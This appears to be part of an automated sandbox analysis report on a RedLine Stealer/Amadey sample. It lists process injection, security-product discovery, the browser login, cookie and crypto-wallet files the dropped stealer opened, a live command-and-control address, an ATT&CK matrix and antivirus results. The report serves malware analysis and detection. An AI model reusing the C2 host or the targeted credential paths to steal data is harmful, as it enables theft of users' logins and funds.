                    Source: 3Qv3xyyL5G.exe, svchost.exe, 65D35BAB97073674480464.exe, audiodg.exe, msiexec.exeBinary or memory string: procmon.exe
                    Source: 3Qv3xyyL5G.exe, svchost.exe, 65D35BAB97073674480464.exe, audiodg.exe, msiexec.exeBinary or memory string: procexp.exe
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1822986372.000000000120B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: 3Qv3xyyL5G.exe, svchost.exe, 65D35BAB97073674480464.exe, audiodg.exe, msiexec.exeBinary or memory string: autoruns.exe
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 6.0.25A2.tmp.ssg.exe.a90000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000000.1604653153.0000000000A92000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000003.1603564510.000000000A37C000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4084, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: 25A2.tmp.ssg.exe PID: 3340, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exe, type: DROPPED
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Tries to steal Crypto Currency Wallets
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                    Source: Yara matchFile source: 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 25A2.tmp.ssg.exe PID: 3340, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 6.0.25A2.tmp.ssg.exe.a90000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000000.1604653153.0000000000A92000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000003.1603564510.000000000A37C000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4084, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: 25A2.tmp.ssg.exe PID: 3340, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exe, type: DROPPED

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    Abuse Elevation Control Mechanism                    		1
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		12
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts13
                    Native API                    		1
                    Registry Run Keys / Startup Folder                    		1
                    DLL Side-Loading                    		1
                    Deobfuscate/Decode Files or Information                    		1
                    Credential API Hooking                    		1
                    Account Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		1
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    Shared Modules                    		Logon Script (Windows)1
                    Access Token Manipulation                    		1
                    Abuse Elevation Control Mechanism                    		Security Account Manager2
                    File and Directory Discovery                    		SMB/Windows Admin Shares1
                    Credential API Hooking                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts1
                    Exploitation for Client Execution                    		Login Hook912
                    Process Injection                    		2
                    Obfuscated Files or Information                    		NTDS136
                    System Information Discovery                    		Distributed Component Object Model3
                    Clipboard Data                    		2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                    Registry Run Keys / Startup Folder                    		1
                    Timestomp                    		LSA Secrets681
                    Security Software Discovery                    		SSHKeylogging122
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading                    		Cached Domain Credentials351
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Rootkit                    		DCSync3
                    Process Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    Masquerading                    		Proc Filesystem1
                    Application Window Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt351
                    Virtualization/Sandbox Evasion                    		/etc/passwd and /etc/shadow1
                    System Owner/User Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                    Access Token Manipulation                    		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd912
                    Process Injection                    		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                    Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                    Hidden Files and Directories                    		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1575324 Sample: 3Qv3xyyL5G.exe Startdate: 15/12/2024 Architecture: WINDOWS Score: 100 69 Suricata IDS alerts for network traffic 2->69 71 Found malware configuration 2->71 73 Antivirus detection for URL or domain 2->73 75 7 other signatures 2->75 9 3Qv3xyyL5G.exe 1 3 2->9         started        process3 file4 55 C:\Users\user\...\65D35BAB97073674480464.exe, PE32+ 9->55 dropped 57 65D35BAB9707367448...exe:Zone.Identifier, ASCII 9->57 dropped 81 Found evasive API chain (may stop execution after checking mutex) 9->81 83 Found API chain indicative of debugger detection 9->83 85 Contains functionality to inject code into remote processes 9->85 87 7 other signatures 9->87 13 svchost.exe 1 9->13         started        16 audiodg.exe 2 9->16         started        18 msiexec.exe 2 9->18         started        signatures5 process6 signatures7 115 Found evasive API chain (may stop execution after checking mutex) 13->115 117 Found API chain indicative of debugger detection 13->117 119 Injects code into the Windows Explorer (explorer.exe) 13->119 20 explorer.exe 47 17 13->20 injected 121 Changes the view of files in windows explorer (hidden files and folders) 16->121 123 Writes to foreign memory regions 16->123 125 Creates a thread in another existing process (thread injection) 16->125 127 Injects a PE file into a foreign processes 18->127 process8 dnsIp9 67 185.81.68.147, 1912, 49705, 49706 KLNOPT-ASFI Finland 20->67 49 C:\Users\user\AppData\...\5995.tmp.update.exe, PE32+ 20->49 dropped 51 C:\Users\user\AppData\...\4F82.tmp.zx.exe, PE32+ 20->51 dropped 53 C:\Users\user\AppData\...\25A2.tmp.ssg.exe, PE32 20->53 dropped 77 System process connects to network (likely due to code injection or exploit) 20->77 79 Benign windows process drops PE files 20->79 25 4F82.tmp.zx.exe 52 20->25         started        29 65D35BAB97073674480464.exe 3 20->29         started        31 65D35BAB97073674480464.exe 3 20->31         started        33 25A2.tmp.ssg.exe 5 4 20->33         started        file10 signatures11 process12 file13 59 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 25->59 dropped 61 C:\Users\user\AppData\Local\...\ucrtbase.dll, PE32+ 25->61 dropped 63 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 25->63 dropped 65 47 other files (7 malicious) 25->65 dropped 89 Multi AV Scanner detection for dropped file 25->89 91 Machine Learning detection for dropped file 25->91 35 4F82.tmp.zx.exe 25->35         started        93 Found evasive API chain (may stop execution after checking mutex) 29->93 95 Found API chain indicative of debugger detection 29->95 97 Writes to foreign memory regions 29->97 99 Injects a PE file into a foreign processes 29->99 37 svchost.exe 29->37         started        39 audiodg.exe 29->39         started        41 msiexec.exe 29->41         started        101 Allocates memory in foreign processes 31->101 103 Modifies the context of a thread in another process (thread injection) 31->103 113 2 other signatures 31->113 43 svchost.exe 31->43         started        45 audiodg.exe 31->45         started        47 msiexec.exe 31->47         started        105 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 33->105 107 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 33->107 109 Tries to harvest and steal browser information (history, passwords, etc) 33->109 111 Tries to steal Crypto Currency Wallets 33->111 signatures14 process15

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    3Qv3xyyL5G.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\5995.tmp.update.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exe92%ReversingLabsByteCode-MSIL.Trojan.RedLineStealz
                    C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe34%ReversingLabsWin64.Trojan.Amadey
                    C:\Users\user\AppData\Local\Temp\_MEI37682\VCRUNTIME140.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\_bz2.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\_ctypes.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\_hashlib.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\_lzma.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\_socket.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-console-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-datetime-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-debug-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-errorhandling-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-file-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-file-l1-2-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-file-l2-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-handle-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-heap-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-interlocked-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-libraryloader-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-localization-l1-2-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-memory-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-namedpipe-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-processenvironment-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-processthreads-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-processthreads-l1-1-1.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-profile-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-rtlsupport-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-string-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-synch-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-synch-l1-2-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-sysinfo-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-timezone-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-util-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-conio-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-convert-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-environment-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-filesystem-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-heap-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-locale-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-math-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-process-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-runtime-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-stdio-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-string-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-time-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-utility-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\libcrypto-1_1.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\libffi-7.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\python38.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\select.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\ucrtbase.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI37682\unicodedata.pyd0%ReversingLabs

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://android.notify.windows.com/iOSd0%Avira URL Cloudsafe
                    https://powerpoint.office.comer0%Avira URL Cloudsafe
                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA0%Avira URL Cloudsafe
                    http://schemas.datacontract.org0%Avira URL Cloudsafe
                    http://185.81.68.147/VzCAHn.php?65D35BAB97073674480464100%Avira URL Cloudphishing
                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark0%Avira URL Cloudsafe
                    http://schemas.datacontract.org/2004/07/System.ServiceModel$0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    No contacted domains info

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://185.81.68.147/VzCAHn.php?65D35BAB97073674480464true
                    • Avira URL Cloud: phishing
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://schemas.xmlsoap.org/ws/2005/02/sc/sct25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://powerpoint.office.comerexplorer.exe, 00000005.00000002.2801032644.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1541930991.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://schemas.datacontract.org25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002F69000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://tempuri.org/Entity/Id23ResponseD25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000003010000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000005.00000000.1533270672.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2789164926.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2287065836.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                              		high
                              http://tempuri.org/Entity/Id12Response25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-worldexplorer.exe, 00000005.00000000.1533270672.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2789164926.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2287065836.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                  		high
                                  https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000005.00000000.1535548358.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2793022789.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1533270672.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2284159201.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2789164926.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2287065836.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		high
                                    http://tempuri.org/25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://tempuri.org/Entity/Id2Response25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha125A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://tempuri.org/Entity/Id21Response25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#4F82.tmp.zx.exe, 0000000D.00000003.1734398027.0000020C08080000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000D.00000003.1735055146.0000020C08092000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000D.00000002.1740650444.0000020C0800D000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000D.00000003.1734398027.0000020C08053000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://tempuri.org/Entity/Id6ResponseD25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000003008000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://tempuri.org/Entity/Id13ResponseD25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002F69000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/fault25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://schemas.xmlsoap.org/ws/2004/10/wsat25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://tempuri.org/Entity/Id15Response25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://tempuri.org/Entity/Id14V25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002EDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://android.notify.windows.com/iOSdexplorer.exe, 00000005.00000003.2173753327.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1541930991.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsiexplorer.exe, 00000005.00000000.1533270672.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2789164926.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2287065836.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              		high
